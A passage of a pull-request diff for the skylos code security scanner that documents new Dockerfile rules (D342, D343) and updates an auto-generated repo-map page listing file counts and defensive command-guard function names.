### PR TITLE
feat(agent): add skylos verify workflow

### DIFF
--- a/README.md
+++ b/README.md
@@ -211,6 +211,7 @@ and scanner scope.
 |:---|:---|:---|
 | GitHub Actions | `.github/workflows/*.yml`, `.github/workflows/*.yaml`, `action.yml`, `action.yaml` | dangerous triggers, token permissions, unpinned actions, template injection, secrets, OIDC, cache, and artifact policy |
 | GitLab CI | `.gitlab-ci.yml` | mutable images, unpinned includes, literal secrets, untrusted eval, Docker-in-Docker, OIDC, cache, timeout, and runner-tag policy |
+| Dockerfile | `Dockerfile`, `Dockerfile.*`, `*.dockerfile` | dangerous `RUN` commands, remote `ADD` without checksum, and literal build `ARG` / `ENV` secrets |
 | Edge Docker Compose | `compose*.yml`, `compose*.yaml`, `docker-compose*.yml`, `docker-compose*.yaml` | privileged containers, broad host device/control mounts, GPU/device runtime, and host networking |
 | Edge systemd | `*.service` | root edge services, mutable `ExecStart` paths, missing sandboxing, broad capabilities, and broad device access |
 

--- a/dictionary.md
+++ b/dictionary.md
@@ -172,6 +172,8 @@ Finding types:
 | D339 | HIGH | Persistent environment mutation | Shell, Python, TS/JS, GitHub Actions, GitLab CI, Dockerfile |
 | D340 | HIGH | Unapproved package or artifact publish | Shell, Python, TS/JS, GitHub Actions, GitLab CI, Dockerfile |
 | D341 | HIGH | Untrusted package-managed tool execution | Shell, Python, TS/JS, GitHub Actions, GitLab CI, Dockerfile |
+| D342 | HIGH | Dockerfile remote ADD without checksum | Dockerfile |
+| D343 | HIGH | Dockerfile literal secret build value | Dockerfile |
 
 ### Config And Deployment Security
 

--- a/docs/repo-map/index.html
+++ b/docs/repo-map/index.html
@@ -38,8 +38,8 @@
       <h2>Repo Snapshot</h2>
       <p class="lede">Use the route cards first. The folder and symbol sections are there when you need detail.</p>
       <div class="meta-grid">
-        <div class="metric"><strong>655</strong><span>Python files scanned</span></div>
-        <div class="metric"><strong>5480</strong><span>top-level classes/functions</span></div>
+        <div class="metric"><strong>667</strong><span>Python files scanned</span></div>
+        <div class="metric"><strong>5689</strong><span>top-level classes/functions</span></div>
         <div class="metric"><strong>32</strong><span>ownership areas</span></div>
         <div class="metric"><strong>12</strong><span>guided routes</span></div>
       </div>
@@ -655,7 +655,7 @@
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos" rel="noopener noreferrer">skylos</a></h3>
         <div class="stat-row">
           <span class="pill"><strong>files</strong> 6</span>
-          <span class="pill"><strong>symbols</strong> 250</span>
+          <span class="pill"><strong>symbols</strong> 258</span>
         </div>
       </div>
       <p>Root entrypoints and shared scan orchestration.</p>
@@ -683,11 +683,11 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">comment_out_unused_import_cst</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">comment_out_unused_function_cst</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">run_analyze</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">ConfigError</a> <span>class</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">load_config</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">resolve_config_file_path</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">is_path_excluded</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">is_whitelisted</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">get_expired_whitelists</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">get_all_ignore_lines</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/analyzer.py" rel="noopener noreferrer">Skylos</a> <span>class</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/analyzer.py" rel="noopener noreferrer">proc_file</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/analyzer.py" rel="noopener noreferrer">analyze</a> <span>def</span></li>
@@ -878,12 +878,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="skylos/audit deep-audit candidate selection, processing, redaction, export, and revalidation. use this for audit packets, changed-file audits, and post-scan review artifacts. skylos/audit/processor.py skylos/audit/candidates.py skylos/audit/revalidator.py test/test_audit_candidates.py test/test_audit_ci.py test/test_audit_cli.py test/test_audit_export.py test/test_audit_processor.py test/test_audit_revalidator.py skylos/audit/export.py skylos/audit/candidates.py skylos/audit/processor.py skylos/audit/types.py skylos/audit/revalidator.py skylos/audit/ci.py skylos/audit/polyglot.py skylos/audit/redaction.py">
+    <article class="folder-card searchable" data-search="skylos/audit deep-audit candidate selection, processing, redaction, export, and revalidation. use this for audit packets, changed-file audits, and post-scan review artifacts. skylos/audit/processor.py skylos/audit/candidates.py skylos/audit/revalidator.py test/test_audit_candidates.py test/test_audit_ci.py test/test_audit_cli.py test/test_audit_export.py test/test_audit_processor.py test/test_audit_revalidator.py skylos/audit/export.py skylos/audit/processor.py skylos/audit/candidates.py skylos/audit/types.py skylos/audit/revalidator.py skylos/audit/ci.py skylos/audit/polyglot.py skylos/audit/redaction.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit" rel="noopener noreferrer">skylos/audit</a></h3>
         <div class="stat-row">
           <span class="pill"><strong>files</strong> 10</span>
-          <span class="pill"><strong>symbols</strong> 96</span>
+          <span class="pill"><strong>symbols</strong> 107</span>
         </div>
       </div>
       <p>Deep-audit candidate selection, processing, redaction, export, and revalidation.</p>
@@ -898,8 +898,8 @@
       <div>
         <div class="mini-label">Important files</div>
         <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/export.py" rel="noopener noreferrer">skylos/audit/export.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">skylos/audit/candidates.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">skylos/audit/processor.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">skylos/audit/candidates.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/types.py" rel="noopener noreferrer">skylos/audit/types.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/revalidator.py" rel="noopener noreferrer">skylos/audit/revalidator.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/ci.py" rel="noopener noreferrer">skylos/audit/ci.py</a></li>
@@ -913,15 +913,15 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/export.py" rel="noopener noreferrer">write_deep_audit_export</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/export.py" rel="noopener noreferrer">_resolve_deep_audit_export_path</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/export.py" rel="noopener noreferrer">_normalized_allowed_files</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">scan_deep_audit_candidates</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_project_root</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_resolve_audit_file</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_discover_audit_files</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_is_audit_file</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">process_deep_audit_records</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">_record_sort_key</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">_normalized_allowed_files</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">_is_active_record</a> <span>def</span></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">_is_active_record</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">_should_process_record</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">scan_deep_audit_candidates</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_project_root</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_resolve_audit_file</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_discover_audit_files</a> <span>def</span></li></ul>
       </div>
     </div>
       </details>
@@ -1159,12 +1159,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="skylos/core small shared core types and helpers used across scan paths. use this only for concepts that are truly shared across the product.   skylos/core/gatekeeper.py skylos/core/result_cache.py skylos/core/file_discovery.py skylos/core/grep_verify_common.py skylos/core/grep_verify.py skylos/core/grep_verify_language_strategies.py skylos/core/suite.py skylos/core/cli_shared.py">
+    <article class="folder-card searchable" data-search="skylos/core small shared core types and helpers used across scan paths. use this only for concepts that are truly shared across the product.   skylos/core/gatekeeper.py skylos/core/result_cache.py skylos/core/file_discovery.py skylos/core/grep_verify_common.py skylos/core/grep_verify.py skylos/core/grep_verify_language_strategies.py skylos/core/safe_cache_io.py skylos/core/suite.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core" rel="noopener noreferrer">skylos/core</a></h3>
         <div class="stat-row">
-          <span class="pill"><strong>files</strong> 17</span>
-          <span class="pill"><strong>symbols</strong> 146</span>
+          <span class="pill"><strong>files</strong> 18</span>
+          <span class="pill"><strong>symbols</strong> 155</span>
         </div>
       </div>
       <p>Small shared core types and helpers used across scan paths.</p>
@@ -1184,8 +1184,8 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/grep_verify_common.py" rel="noopener noreferrer">skylos/core/grep_verify_common.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/grep_verify.py" rel="noopener noreferrer">skylos/core/grep_verify.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/grep_verify_language_strategies.py" rel="noopener noreferrer">skylos/core/grep_verify_language_strategies.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/suite.py" rel="noopener noreferrer">skylos/core/suite.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/cli_shared.py" rel="noopener noreferrer">skylos/core/cli_shared.py</a></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/safe_cache_io.py" rel="noopener noreferrer">skylos/core/safe_cache_io.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/suite.py" rel="noopener noreferrer">skylos/core/suite.py</a></li></ul>
       </div>
       <div>
         <div class="mini-label">Key symbols</div>
@@ -1480,12 +1480,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="skylos/llm llm security analysis, evidence grounding, provider runtime resolution, and prompt templates. treat this as high-risk: changes can reduce hallucinations or create scanner false negatives. skylos/llm/analyzer.py skylos/llm/finding_evidence.py skylos/llm/runtime.py test/test_cli_llm_provider.py test/test_litellm_adapter.py test/test_llm_analyzer.py test/test_llm_context.py test/test_llm_finding_evidence.py test/test_llm_graph.py skylos/llm/security_taskflow.py skylos/llm/verify_orchestrator.py skylos/llm/_grounding.py skylos/llm/finding_evidence.py skylos/llm/liveness.py skylos/llm/prompts.py skylos/llm/security_verifier.py skylos/llm/agents.py">
+    <article class="folder-card searchable" data-search="skylos/llm llm security analysis, evidence grounding, provider runtime resolution, and prompt templates. treat this as high-risk: changes can reduce hallucinations or create scanner false negatives. skylos/llm/analyzer.py skylos/llm/finding_evidence.py skylos/llm/runtime.py test/test_cli_llm_provider.py test/test_litellm_adapter.py test/test_llm_analyzer.py test/test_llm_context.py test/test_llm_finding_evidence.py test/test_llm_graph.py skylos/llm/security_taskflow.py skylos/llm/verify_orchestrator.py skylos/llm/_grounding.py skylos/llm/finding_evidence.py skylos/llm/threat_trace.py skylos/llm/liveness.py skylos/llm/prompts.py skylos/llm/security_verifier.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm" rel="noopener noreferrer">skylos/llm</a></h3>
         <div class="stat-row">
-          <span class="pill"><strong>files</strong> 28</span>
-          <span class="pill"><strong>symbols</strong> 346</span>
+          <span class="pill"><strong>files</strong> 29</span>
+          <span class="pill"><strong>symbols</strong> 373</span>
         </div>
       </div>
       <p>LLM security analysis, evidence grounding, provider runtime resolution, and prompt templates.</p>
@@ -1503,10 +1503,10 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/verify_orchestrator.py" rel="noopener noreferrer">skylos/llm/verify_orchestrator.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/_grounding.py" rel="noopener noreferrer">skylos/llm/_grounding.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/finding_evidence.py" rel="noopener noreferrer">skylos/llm/finding_evidence.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/threat_trace.py" rel="noopener noreferrer">skylos/llm/threat_trace.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/liveness.py" rel="noopener noreferrer">skylos/llm/liveness.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/prompts.py" rel="noopener noreferrer">skylos/llm/prompts.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/security_verifier.py" rel="noopener noreferrer">skylos/llm/security_verifier.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/agents.py" rel="noopener noreferrer">skylos/llm/agents.py</a></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/security_verifier.py" rel="noopener noreferrer">skylos/llm/security_verifier.py</a></li></ul>
       </div>
       <div>
         <div class="mini-label">Key symbols</div>
@@ -1690,8 +1690,8 @@
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/rules" rel="noopener noreferrer">skylos/rules</a></h3>
         <div class="stat-row">
-          <span class="pill"><strong>files</strong> 70</span>
-          <span class="pill"><strong>symbols</strong> 553</span>
+          <span class="pill"><strong>files</strong> 72</span>
+          <span class="pill"><strong>symbols</strong> 578</span>
         </div>
       </div>
       <p>Rule catalog and concrete rule implementations for quality, security, config, edge, CI/CD, and SCA findings.</p>
@@ -1768,12 +1768,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="skylos/security security contract detection, secret handling, and security-specific analysis helpers. treat this as gate-sensitive; regressions here can hide vulnerabilities. skylos/security/ test/test_csharp_security.py test/test_dart_security.py test/test_edge_compose_security.py test/test_edge_systemd_security.py test/test_github_actions_security.py test/test_gitlab_ci_security.py skylos/security/contracts.py skylos/security/injection_scanner.py skylos/security/canonicalize.py skylos/security/__init__.py">
+    <article class="folder-card searchable" data-search="skylos/security security contract detection, secret handling, and security-specific analysis helpers. treat this as gate-sensitive; regressions here can hide vulnerabilities. skylos/security/ test/test_csharp_security.py test/test_dart_security.py test/test_dockerfile_security.py test/test_edge_compose_security.py test/test_edge_systemd_security.py test/test_github_actions_security.py skylos/security/command_guard_exfil.py skylos/security/contracts.py skylos/security/command_guard_policy.py skylos/security/command_guard_parse.py skylos/security/injection_scanner.py skylos/security/command_guard_paths.py skylos/security/canonicalize.py skylos/security/command_guard.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security" rel="noopener noreferrer">skylos/security</a></h3>
         <div class="stat-row">
-          <span class="pill"><strong>files</strong> 4</span>
-          <span class="pill"><strong>symbols</strong> 35</span>
+          <span class="pill"><strong>files</strong> 10</span>
+          <span class="pill"><strong>symbols</strong> 95</span>
         </div>
       </div>
       <p>Security contract detection, secret handling, and security-specific analysis helpers.</p>
@@ -1783,31 +1783,35 @@
         <div class="mini-label">Entrypoints</div>
         <div class="link-row"><a href="https://github.com/duriantaco/skylos/tree/main/skylos/security" rel="noopener noreferrer">skylos/security</a></div>
         <div class="mini-label">Nearby tests</div>
-        <div class="link-row"><a href="https://github.com/duriantaco/skylos/blob/main/test/test_csharp_security.py" rel="noopener noreferrer">test/test_csharp_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_dart_security.py" rel="noopener noreferrer">test/test_dart_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_edge_compose_security.py" rel="noopener noreferrer">test/test_edge_compose_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_edge_systemd_security.py" rel="noopener noreferrer">test/test_edge_systemd_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_github_actions_security.py" rel="noopener noreferrer">test/test_github_actions_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_gitlab_ci_security.py" rel="noopener noreferrer">test/test_gitlab_ci_security.py</a></div>
+        <div class="link-row"><a href="https://github.com/duriantaco/skylos/blob/main/test/test_csharp_security.py" rel="noopener noreferrer">test/test_csharp_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_dart_security.py" rel="noopener noreferrer">test/test_dart_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_dockerfile_security.py" rel="noopener noreferrer">test/test_dockerfile_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_edge_compose_security.py" rel="noopener noreferrer">test/test_edge_compose_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_edge_systemd_security.py" rel="noopener noreferrer">test/test_edge_systemd_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_github_actions_security.py" rel="noopener noreferrer">test/test_github_actions_security.py</a></div>
         <div class="split-list">
       <div>
         <div class="mini-label">Important files</div>
-        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">skylos/security/contracts.py</a></li>
+        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">skylos/security/command_guard_exfil.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">skylos/security/contracts.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_policy.py" rel="noopener noreferrer">skylos/security/command_guard_policy.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_parse.py" rel="noopener noreferrer">skylos/security/command_guard_parse.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">skylos/security/injection_scanner.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_paths.py" rel="noopener noreferrer">skylos/security/command_guard_paths.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/canonicalize.py" rel="noopener noreferrer">skylos/security/canonicalize.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/__init__.py" rel="noopener noreferrer">skylos/security/__init__.py</a></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard.py" rel="noopener noreferrer">skylos/security/command_guard.py</a></li></ul>
       </div>
       <div>
         <div class="mini-label">Key symbols</div>
-        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">SecurityContract</a> <span>class</span></li>
+        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">command_risks</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">pipeline_risks</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">_pipeline_has_data_exfil</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">_pipeline_has_remote_script_execution</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">_is_sensitive_source</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">SecurityContract</a> <span>class</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">RouteSnapshot</a> <span>class</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">load_security_contracts</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">resolve_diff_base_ref</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">detect_security_contract_regressions</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">scan_file</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">scan_directory</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">_extract_segments</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">_markdown_fence_marker</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">_matched_fenced_block_lines</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/canonicalize.py" rel="noopener noreferrer">normalize</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/canonicalize.py" rel="noopener noreferrer">strip_zero_width</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/canonicalize.py" rel="noopener noreferrer">decode_base64_blobs</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/canonicalize.py" rel="noopener noreferrer">detect_homoglyphs</a> <span>def</span></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_policy.py" rel="noopener noreferrer">token_policy_risks</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_policy.py" rel="noopener noreferrer">command_policy_risks</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_policy.py" rel="noopener noreferrer">_is_package_registry_override</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_policy.py" rel="noopener noreferrer">_is_sensitive_scope_access</a> <span>def</span></li></ul>
       </div>
     </div>
       </details>
@@ -1862,12 +1866,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="skylos/visitors ast/tree visitors that collect findings and semantic evidence. use this when a language-specific scan is missing or over-reporting code patterns. skylos/visitors/  skylos/visitors/languages/java/danger.py skylos/visitors/languages/typescript/analysis.py skylos/visitors/languages/typescript/danger.py skylos/visitors/languages/shell/danger.py skylos/visitors/languages/typescript/workspace.py skylos/visitors/languages/csharp/danger.py skylos/visitors/languages/typescript/resolve.py skylos/visitors/languages/csharp/core.py">
+    <article class="folder-card searchable" data-search="skylos/visitors ast/tree visitors that collect findings and semantic evidence. use this when a language-specific scan is missing or over-reporting code patterns. skylos/visitors/  skylos/visitors/languages/typescript/analysis.py skylos/visitors/languages/typescript/danger.py skylos/visitors/languages/java/danger.py skylos/visitors/languages/shell/danger.py skylos/visitors/languages/typescript/workspace.py skylos/visitors/languages/csharp/danger.py skylos/visitors/languages/typescript/resolve.py skylos/visitors/languages/csharp/core.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors" rel="noopener noreferrer">skylos/visitors</a></h3>
         <div class="stat-row">
           <span class="pill"><strong>files</strong> 39</span>
-          <span class="pill"><strong>symbols</strong> 336</span>
+          <span class="pill"><strong>symbols</strong> 342</span>
         </div>
       </div>
       <p>AST/tree visitors that collect findings and semantic evidence.</p>
@@ -1881,9 +1885,9 @@
         <div class="split-list">
       <div>
         <div class="mini-label">Important files</div>
-        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">skylos/visitors/languages/java/danger.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">skylos/visitors/languages/typescript/analysis.py</a></li>
+        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">skylos/visitors/languages/typescript/analysis.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">skylos/visitors/languages/typescript/danger.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">skylos/visitors/languages/java/danger.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/shell/danger.py" rel="noopener noreferrer">skylos/visitors/languages/shell/danger.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/workspace.py" rel="noopener noreferrer">skylos/visitors/languages/typescript/workspace.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/csharp/danger.py" rel="noopener noreferrer">skylos/visitors/languages/csharp/danger.py</a></li>
@@ -1892,12 +1896,7 @@
       </div>
       <div>
         <div class="mini-label">Key symbols</div>
-        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">scan_danger</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_shannon_entropy</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_get_query</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_get_text</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_run_batch</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">resolve_ts_module</a> <span>def</span></li>
+        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">resolve_ts_module</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">build_ts_import_graph</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">demote_unconsumed_ts_exports</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">find_dead_ts_files</a> <span>def</span></li>
@@ -1905,7 +1904,12 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">scan_danger</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">_shannon_entropy</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">_get_query</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">_get_text</a> <span>def</span></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">_get_text</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">_is_sensitive_name</a> <span>def</span></li>
